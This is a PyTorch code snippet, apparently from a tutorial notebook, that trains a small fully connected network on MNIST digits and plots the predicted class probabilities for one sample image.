# transforms.Compose converts the images to tensors and then
# normalizes them into the range [-1, 1]
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean, std)])
trainset = torchvision.datasets.MNIST('~/.pytorch/MNIST_data/', train=True,
transform=transform, download=True)
trainloader = torch.utils.data.DataLoader(trainset,batch_size=64, shuffle=True)
num_of_images = trainloader.dataset.data.shape[0]
height = trainloader.dataset.data.shape[1]
width = trainloader.dataset.data.shape[2]
input_size = height * width
hidden_layers = [128,64]
output_size = 10
from torch.nn.modules.linear import Linear
model = nn.Sequential(nn.Linear(input_size,hidden_layers[0]),
nn.ReLU(),
nn.Linear(hidden_layers[0],hidden_layers[1]),
nn.ReLU(),
nn.Linear(hidden_layers[1], output_size),
nn.LogSoftmax(dim=1)
)
print(model)
criterion = nn.NLLLoss()
optimizer = optim.SGD(model.parameters(), lr = 0.003)
epochs = 5
loss = 0
for e in range(epochs):
running_loss = 0
for images, labels in trainloader:
#Flatten the image from 28*28 to 784*1 column vector
images = images.view(images.shape[0], -1)
#set grad to 0
optimizer.zero_grad()
output = model(images)
loss = criterion(output,labels)
#backprop
loss.backward()
#update the grads
optimizer.step()
running_loss += loss.item()
loss = running_loss
print("Training loss:",(loss/len(trainloader)))
def view_classify(img, ps):
ps = ps.data.numpy().squeeze()
fig, (ax1, ax2) = plt.subplots(figsize=(6,9), ncols=2)
ax1.imshow(img.resize_(1, 28, 28).numpy().squeeze())
ax1.axis('off')
ax2.barh(np.arange(10), ps)
ax2.set_aspect(0.1)
ax2.set_yticks(np.arange(10))
ax2.set_yticklabels(np.arange(10))
ax2.set_title('Class Probability')
ax2.set_xlim(0, 1.1)
plt.tight_layout()
# Getting the image to test
images, labels = next(iter(trainloader))
img = images[0].view(1,784)
with torch.no_grad():
logps = model(img)
ps = torch.exp(logps)
view_classify(img,ps)
```